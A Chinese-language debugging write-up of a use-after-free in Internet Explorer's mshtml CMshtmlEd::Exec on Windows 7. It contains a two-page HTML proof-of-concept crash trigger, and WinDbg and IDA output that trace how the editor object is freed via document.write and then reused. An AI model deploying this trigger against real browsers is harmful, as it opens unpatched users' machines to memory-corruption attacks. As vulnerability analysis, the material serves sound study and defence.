请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞环境:
Win7 32
Windbg
IDA6.8
POC:
<html><body><script>var arrr = newArray();arrr[0] = window.document.createElement("img");arrr[0]["src"] = "f";</script><iframesrc="./payload.html"></iframe></body></html>
<HTML><script>functionfuncB() {document.execCommand("selectAll");};functionfuncA() {document.write("B");parent.arrr[0].src = "YMjfu0c08u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";}</script><bodyonload='funcB();'onselect='funcA()'><divcontenteditable='true'>a</div></body></HTML>
方法一:
0:013> gModLoad: 6b560000 6b612000 C:WindowsSystem32jscript.dll(6a8.cd0): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=00677dc0 edx=0000000d esi=00000000 edi=0c0c0c08eip=63cd5041 esp=02499c64 ebp=02499c70 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CMshtmlEd::Exec+0x134:63cd5041 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????
edi所指向的值无效,且崩溃发生在CMshtmlEd::Exec中,我们打开IDA查看一下这个函数的逻辑
我们利用IDA加载mshtml.dll查找CMshtmlEd::Exec函数,找到我们奔溃的这条命令
.text:74E64FAF ; public: virtual long __stdcall CMshtmlEd::Exec(struct _GUID const *, unsigned long, unsigned long, struct tagVARIANT *, struct tagVARIANT *).text:74E64FAF ?Exec@CMshtmlEd@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z proc near.text:74E64FAF ; DATA XREF: .text:74DDA4D8o.text:74E64FAF.text:74E64FAF arg_0 = dword ptr 8.text:74E64FAF arg_4 = dword ptr 0Ch.text:74E64FAF arg_8 = dword ptr 10h.text:74E64FAF arg_C = dword ptr 14h.text:74E64FAF arg_10 = dword ptr 18h.text:74E64FAF arg_14 = dword ptr 1Ch.text:74E64FAF.text:74E64FAF ; FUNCTION CHUNK AT .text:74EFDCED SIZE 000000AB BYTES.text:74E64FAF.text:74E64FAF mov edi, edi.text:74E64FB1 push ebp.text:74E64FB2 mov ebp, esp.text:74E64FB4 push ebx.text:74E64FB5 push esi.text:74E64FB6 push edi.text:74E64FB7 mov edi, [ebp+arg_0].text:74E64FBA mov eax, [edi+8].text:74E64FBD mov ecx, [eax].text:74E64FBF push eax.text:74E64FC0 mov esi, 80040100h.text:74E64FC5 call dword ptr [ecx+4].text:74E64FC8 cmp [ebp+arg_C], 3.text:74E64FCC jz short loc_74E6503E.text:74E64FCE mov ebx, [ebp+arg_8].text:74E64FD1 cmp ebx, 90Eh.text:74E64FD7 jnz loc_74EFDCED.text:74E64FDD.text:74E64FDD loc_74E64FDD: ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+98D4Aj.text:74E64FDD push [ebp+arg_14].text:74E64FE0 mov eax, [edi+8].text:74E64FE3 push [ebp+arg_10].text:74E64FE6 push [ebp+arg_C].text:74E64FE9 push ebx.text:74E64FEA push [ebp+arg_4].text:74E64FED call ?InternalExec@CHTMLEditor@@QAEJPBU_GUID@@KKPAUtagVARIANT@@1@Z ; CHTMLEditor::InternalExec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *).text:74E64FF2 mov esi, eax.text:74E64FF4 test esi, esi.text:74E64FF6 jl short loc_74E6503E.text:74E64FF8 jz short loc_74E6503E.text:74E64FFA mov eax, 91Ch.text:74E64FFF cmp ebx, eax.text:74E65001 jnb loc_74EFDD04.text:74E65007.text:74E65007 loc_74E65007: ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+98D5Aj.text:74E65007 push [ebp+arg_10].text:74E6500A push ebx.text:74E6500B push [ebp+arg_C].text:74E6500E call ?IsDialogCommand@CMshtmlEd@@AAEHKKPAUtagVARIANT@@@Z ; CMshtmlEd::IsDialogCommand(ulong,ulong,tagVARIANT *).text:74E65013 test eax, eax.text:74E65015 mov eax, [edi+8].text:74E65018 mov eax, [eax+50h].text:74E6501B jnz loc_74EFDD91.text:74E65021.text:74E65021 loc_74E65021: ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+98DE4j.text:74E65021 push ebx.text:74E65022call ?Get@CCommandTable@@QAEPAVCCommand@@K@Z ; CCommandTable::Get(ulong).text:74E65027 test eax, eax.text:74E65029 jz short loc_74E65050.text:74E6502B push edi.text:74E6502C push [ebp+arg_14].text:74E6502F mov esi, eax.text:74E65031 push [ebp+arg_10].text:74E65034 push [ebp+arg_C].text:74E65037call ?Exec@CCommand@@QAEJKPAUtagVARIANT@@0PAVCMshtmlEd@@@Z ; CCommand::Exec(ulong,tagVARIANT *,tagVARIANT *,CMshtmlEd *).text:74E6503C mov esi, eax.text:74E6503E.text:74E6503E loc_74E6503E: ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+1Dj.text:74E6503E ; CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+47j ....text:74E6503E mov edi, [edi+8].text:74E65041 mov eax, [edi].text:74E65043 push edi.text:74E65044call dword ptr [eax+8].text:74E65047 mov eax, esi
因为Win7有ASLR机制,所以看后四位即74E65041等价于63cd5041
之所以在Windbg中会崩溃是因为edi所指向的值为空,而在IDA中.text:74E64FB7 mov edi, [ebp+arg_0]可以看到edi的值由ebp+arg_0提供
PS:ebp+arg_0在C中指的是最后一个入栈的参数,即从左往右数第一个参数
在调试堆漏洞时,一般会开启页堆,方便调试
直接在Windbg命令行中运行命令(直接在Windbg中运行gflag可能会导致后面!heap命令无效,推荐在Windbg目录下使用命令行gflags.exe /i iexplore.exe +hpa +ust)
0:005>!gflag +hpa +ustNew NtGlobalFlag contents: 0x02001000ust -Createuser mode stack trace databasehpa - Place heap allocations at ends of pages
下断点,重新触发崩溃
0:013> bp mshtml!CMshtmlEd::Exec0:013> gModLoad: 6a260000 6a312000 C:WindowsSystem32jscript.dllBreakpoint0 hiteax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204faf esp=04539c04 ebp=04539c30 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec:66204faf 8bff mov edi,edi0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb1 esp=04539c04 ebp=04539c30 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x2:66204fb1 55 push ebp0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb2 esp=04539c00 ebp=04539c30 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x3:66204fb2 8bec mov ebp,esp0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb4 esp=04539c00 ebp=04539c00 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x5:66204fb4 53 push ebx0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb5 esp=04539bfc ebp=04539c00 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x6:66204fb5 56 push esi0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb6 esp=04539bf8 ebp=04539c00 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x7:66204fb6 57 push edi0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb7 esp=04539bf4 ebp=04539c00 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x8:66204fb7 8b7d08 mov edi,dword ptr [ebp+8] ss:0023:04539c08=07d94f780:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=07d94f78eip=66204fba esp=04539bf4 ebp=04539c00 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0xb:66204fba 8b4708 mov eax,dword ptr [edi+8] ds:0023:07d94f80=07fc4f200:005> !heap -p -a ediaddress 07d94f78 found in_DPH_HEAP_ROOT @ 12f1000in busy allocation ( DPH_HEAP_BLOCK: UserAddrUserSize - VirtAddrVirtSize)7b62b2c: 7d94f78 88 - 7d94000 2000mshtml!CMshtmlEd::`vftable'6fe78e89 verifier!AVrfDebugPageHeapAllocate+0x00000229770b5e26 ntdll!RtlDebugAllocateHeap+0x000000307707a376 ntdll!RtlpAllocateHeap+0x000000c477045ae0 ntdll!RtlAllocateHeap+0x0000023a6612a5f8 mshtml!CHTMLEditor::AddCommandTarget+0x000000206629c119 mshtml!CHTMLEditor::GetCommandTarget+0x0000009466203945 mshtml!CHTMLEditorProxy::GetCommandTarget+0x0000001e661d843d mshtml!CEditRouter::SetInternalEditHandler+0x00000064661d7f69 mshtml!CEditRouter::ExecEditCommand+0x000000d5661b3888 mshtml!CDoc::ExecHelper+0x00003cdb662f5397 mshtml!CDocument::Exec+0x00000024663350f6 mshtml!CBase::execCommand+0x00000053662f7090 mshtml!CDocument::execCommand+0x000000946632e043 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x0000014e661ef10b mshtml!CBase::ContextInvokeEx+0x000005dc661eef72 mshtml!CBase::InvokeEx+0x00000025661fb7fa mshtml!DispatchInvokeCollection+0x0000014c6619f00c mshtml!CDocument::InvokeEx+0x000000f06619bc52 mshtml!CBase::VersionedInvokeEx+0x000000206619bc0e mshtml!PlainInvokeEx+0x000000eb6a26a26e jscript!IDispatchExInvokeEx2+0x000001046a26a1b9 jscript!IDispatchExInvokeEx+0x0000006a6a26a43a jscript!InvokeDispatchEx+0x000000986a26a4e4 jscript!VAR::InvokeByName+0x000001396a27d9a8 jscript!VAR::InvokeDispName+0x0000007d6a27da4f jscript!VAR::InvokeByDispID+0x000000ce6a27e4c7 jscript!CScriptRuntime::Run+0x00002b806a275d7d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce6a275cdb jscript!ScrFncObj::Call+0x0000008d6a275ef1 jscript!CSession::Execute+0x0000015f6a26f4c6 jscript!NameTbl::InvokeDef+0x000001b56a26eb02 jscript!NameTbl::InvokeEx+0x0000012c0:005> dps edi07d94f78 6617a4c8 mshtml!CMshtmlEd::`vftable'07d94f7c 0000000207d94f80 07fc4f2007d94f84 0738ffc007d94f88 07842fd807d94f8c 0000000007d94f90 0000000007d94f94 0000000007d94f98 0000000007d94f9c 0000000007d94fa0 0000000007d94fa4 0000000007d94fa8 0000000007d94fac 0000000007d94fb0 0000000007d94fb4 0000000007d94fb8 0000000007d94fbc 0000000007d94fc0 0000000007d94fc4 0000000007d94fc8 0000000007d94fcc 0000000007d94fd0 0000000007d94fd4 0000000007d94fd8 0000000007d94fdc 0000000007d94fe0 0000000007d94fe4 0000000007d94fe8 0000000007d94fec 07d94f7807d94ff0 0000000007d94ff4 000000000:005> g(f64.7a8): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=07fc4f30 edx=0000000d esi=00000000 edi=07d94f78eip=6620503e esp=04539bf4 ebp=04539c00 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CMshtmlEd::Exec+0x131:6620503e 8b7f08 mov edi,dword ptr [edi+8] ds:0023:07d94f80=????????
第二次运行到断点时,此时edi+8所指向的已经是一个无效的值,这就是一个典型的释放后重用的过程,edi这两次运行中间被free了
我们查看一下mshtml!CMshtmlEd中的其他函数,看看是否有相关函数可以释放这个对象
0:005> x mshtml!CMshtmlEd::*6620352b mshtml!CMshtmlEd::Release=<no type information>662038cd mshtml!CMshtmlEd::QueryInterface=<no type information>6612a635 mshtml!CMshtmlEd::Initialize=<no type information>6617a5d9 mshtml!CMshtmlEd::AddRef=<no type information>6617a4c8 mshtml!CMshtmlEd::`vftable' =<no type information>66204ee2 mshtml!CMshtmlEd::IsDialogCommand=<no type information>6616e118 mshtml!CMshtmlEd::QueryStatus=<no type information>65fe16e3 mshtml!CMshtmlEd::GetSegmentList=<no type information>66204faf mshtml!CMshtmlEd::Exec=<no type information>6612a98d mshtml!CMshtmlEd::CMshtmlEd=<no type information>6621cd5b mshtml!CMshtmlEd::~CMshtmlEd=<no type information>
看名字感觉mshtml!CMshtmlEd::Release这个函数是用来释放内存的,根据IDA的F5查看一下这个函数
int __thiscall CMshtmlEd::Release(CMshtmlEd *this, LPVOID lpMem){bool v2; // zf@1int result; // eax@1v2 = (*((_DWORD *)lpMem + 1))-- == 1;result = *((_DWORD *)lpMem + 1);if ( v2 ){CMshtmlEd::~CMshtmlEd(this);HeapFree(g_hProcessHeap, 0, lpMem);result = 0;}return result;}
可以看到代码中的HeapFree(g_hProcessHeap, 0, lpMem);
在这里必定有释放操作,我们在Windbg中跟踪一下,首先停止调试,然后运行到如上面第一次exec断点处
0:016> bp mshtml!CMshtmlEd::Exec0:016> gModLoad: 6b560000 6b612000 C:WindowsSystem32jscript.dllBreakpoint0 hiteax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204faf esp=04699cb4 ebp=04699ce0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec:66204faf 8bff mov edi,edi0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb1 esp=04699cb4 ebp=04699ce0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x2:66204fb1 55 push ebp0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb2 esp=04699cb0 ebp=04699ce0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x3:66204fb2 8bec mov ebp,esp0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb4 esp=04699cb0 ebp=04699cb0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x5:66204fb4 53 push ebx0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb5 esp=04699cac ebp=04699cb0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x6:66204fb5 56 push esi0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb6 esp=04699ca8 ebp=04699cb0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x7:66204fb6 57 push edi0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb7 esp=04699ca4 ebp=04699cb0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0x8:66204fb7 8b7d08 mov edi,dword ptr [ebp+8] ss:0023:04699cb8=082c3f780:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=082c3f78eip=66204fba esp=04699ca4 ebp=04699cb0 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Exec+0xb:66204fba 8b4708 mov eax,dword ptr [edi+8] ds:0023:082c3f80=080acf20
然后在此时加一个Release的断点,按g运行
0:005> bp mshtml!CMshtmlEd::Release0:005> gBreakpoint 1 hiteax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=6620352b esp=04696130 ebp=04696198 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release:6620352b 8bff mov edi,edi
我们单步跟踪,看看是在哪esi的对象被free了
0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=6620352d esp=04696130 ebp=04696198 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x2:6620352d 55 push ebp0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=6620352e esp=0469612c ebp=04696198 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x3:6620352e 8bec mov ebp,esp0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=66203530 esp=0469612c ebp=0469612c iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x5:6620353056 push esi0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=66203531 esp=04696128 ebp=0469612c iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x6:66203531 8b7508 mov esi,dword ptr [ebp+8] ss:0023:04696134=082c3f780:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=66203534 esp=04696128 ebp=0469612c iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x9:66203534 ff4e04 dec dword ptr [esi+4] ds:0023:082c3f7c=000000020:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=66203537 esp=04696128 ebp=0469612c iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0xc:66203537 8b4604 mov eax,dword ptr [esi+4] ds:0023:082c3f7c=000000010:005> peax=00000001 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=6620353a esp=04696128 ebp=0469612c iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0xf:6620353a 0f84fb970100 je mshtml!CMshtmlEd::Release+0x11 (6621cd3b) [br=0]0:005> peax=00000001 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=66203540 esp=04696128 ebp=0469612c iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x27:66203540 5e pop esi0:005> dps esi082c3f78 6617a4c8 mshtml!CMshtmlEd::`vftable'082c3f7c 00000001082c3f80 080acf20082c3f84 07f22fc0082c3f88 0589efd8082c3f8c 00000000082c3f90 00000000082c3f94 00000000082c3f98 00000000082c3f9c 00000000082c3fa0 00000000082c3fa4 00000000082c3fa8 00000000082c3fac 00000000082c3fb0 00000000082c3fb4 00000000082c3fb8 00000000082c3fbc 00000000082c3fc0 00000000082c3fc4 00000000082c3fc8 00000000082c3fcc 00000000082c3fd0 00000000082c3fd4 00000000082c3fd8 00000000082c3fdc 00000000082c3fe0 00000000082c3fe4 00000000082c3fe8 00000000082c3fec 082c3f78082c3ff0 00000000082c3ff4 00000000
可以看到6620353a处并没有跳入Release函数,直接按g
0:005> gBreakpoint1 hiteax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620352b esp=046960b0 ebp=046960c4 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release:6620352b 8bff mov edi,edi0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620352d esp=046960b0 ebp=046960c4 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x2:6620352d 55 push ebp0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620352e esp=046960ac ebp=046960c4 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x3:6620352e 8bec mov ebp,esp0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203530 esp=046960ac ebp=046960ac iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x5:6620353056 push esi0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203531 esp=046960a8 ebp=046960ac iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x6:66203531 8b7508 mov esi,dword ptr [ebp+8] ss:0023:046960b4=082c3f780:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203534 esp=046960a8 ebp=046960ac iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x9:66203534 ff4e04 dec dword ptr [esi+4] ds:0023:082c3f7c=000000010:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203537 esp=046960a8 ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0xc:66203537 8b4604 mov eax,dword ptr [esi+4] ds:0023:082c3f7c=000000000:005> peax=00000000 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620353a esp=046960a8 ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0xf:6620353a 0f84fb970100 je mshtml!CMshtmlEd::Release+0x11 (6621cd3b) [br=1]0:005> peax=00000000 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd3b esp=046960a8 ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x11:6621cd3b e81b000000 call mshtml!CMshtmlEd::~CMshtmlEd (6621cd5b)0:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd40 esp=046960a8 ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x16:6621cd40 56 push esi0:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd41 esp=046960a4 ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x17:6621cd41 6a00 push 00:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd43 esp=046960a0 ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x19:6621cd43 ff3518844f66 push dword ptr [mshtml!g_hProcessHeap (664f8418)] ds:0023:664f8418=000500000:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd49 esp=0469609c ebp=046960ac iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x1f:6621cd49 ff15fc12fc65 call dword ptr [mshtml!_imp__HeapFree (65fc12fc)] ds:0023:65fc12fc={kernel32!HeapFree (7601bbd0)}0:005> peax=00000001 ebx=080acf8c ecx=77046570 edx=00051078 esi=082c3f78 edi=00000001eip=6621cd4f esp=046960a8 ebp=046960ac iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202mshtml!CMshtmlEd::Release+0x25:6621cd4f 33c0 xor eax,eax0:005> dps esi082c3f78 ????????082c3f7c ????????082c3f80 ????????082c3f84 ????????082c3f88 ????????082c3f8c ????????082c3f90 ????????082c3f94 ????????082c3f98 ????????082c3f9c ????????082c3fa0 ????????082c3fa4 ????????082c3fa8 ????????082c3fac ????????082c3fb0 ????????082c3fb4 ????????082c3fb8 ????????082c3fbc ????????082c3fc0 ????????082c3fc4 ????????082c3fc8 ????????082c3fcc ????????082c3fd0 ????????082c3fd4 ????????082c3fd8 ????????082c3fdc ????????082c3fe0 ????????082c3fe4 ????????082c3fe8 ????????082c3fec ????????082c3ff0 ????????082c3ff4 ????????0:005> !heap -p -a esiaddress 082c3f78 found in_DPH_HEAP_ROOT @ 51000in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddrVirtSize)8320b60: 82c3000 2000732e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2770b65f4 ntdll!RtlDebugFreeHeap+0x0000002f7707a0aa ntdll!RtlpFreeHeap+0x0000005d770465a6 ntdll!RtlFreeHeap+0x000001427601bbe4 kernel32!HeapFree+0x000000146621cd4f mshtml!CMshtmlEd::Release+0x0000002566420391 mshtml!CHTMLEditor::DeleteCommandTarget+0x000000346641bd3a mshtml!CHTMLEditor::RemoveContainer+0x0000015f6629c0e7 mshtml!CHTMLEditor::Notify+0x00000026662045c6 mshtml!CHTMLEditorProxy::Notify+0x00000021661b344e mshtml!CDoc::NotifySelection+0x00000059662247f1 mshtml!COmWindowProxy::SwitchMarkup+0x0000034866013685 mshtml!CDocument::open+0x0000042666010ea1 mshtml!CDocument::write+0x0000007c660c554e mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085661ef10b mshtml!CBase::ContextInvokeEx+0x000005dc661eef72 mshtml!CBase::InvokeEx+0x00000025661fb7fa mshtml!DispatchInvokeCollection+0x0000014c6619f00c mshtml!CDocument::InvokeEx+0x000000f06619bc52 mshtml!CBase::VersionedInvokeEx+0x000000206619bc0e mshtml!PlainInvokeEx+0x000000eb6b56a26e jscript!IDispatchExInvokeEx2+0x000001046b56a1b9 jscript!IDispatchExInvokeEx+0x0000006a6b56a43a jscript!InvokeDispatchEx+0x000000986b56a4e4 jscript!VAR::InvokeByName+0x000001396b57d9a8 jscript!VAR::InvokeDispName+0x0000007d6b57da4f jscript!VAR::InvokeByDispID+0x000000ce6b57e4c7 jscript!CScriptRuntime::Run+0x00002b806b575d7d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce6b575cdb jscript!ScrFncObj::Call+0x0000008d6b575ef1 jscript!CSession::Execute+0x0000015f6b56f4c6 jscript!NameTbl::InvokeDef+0x000001b5
可以看到在6621cd49 处的HeapFree函数将esi所指对象free了
方法二:函数断点跟踪
打开HPA后触发崩溃
0:013> g(a40.bfc): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=05d72f30 edx=0000000d esi=00000000 edi=0705ef78eip=6899503e esp=0463996c ebp=04639978 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CMshtmlEd::Exec+0x131:6899503e 8b7f08 mov edi,dword ptr [edi+8] ds:0023:0705ef80=????????
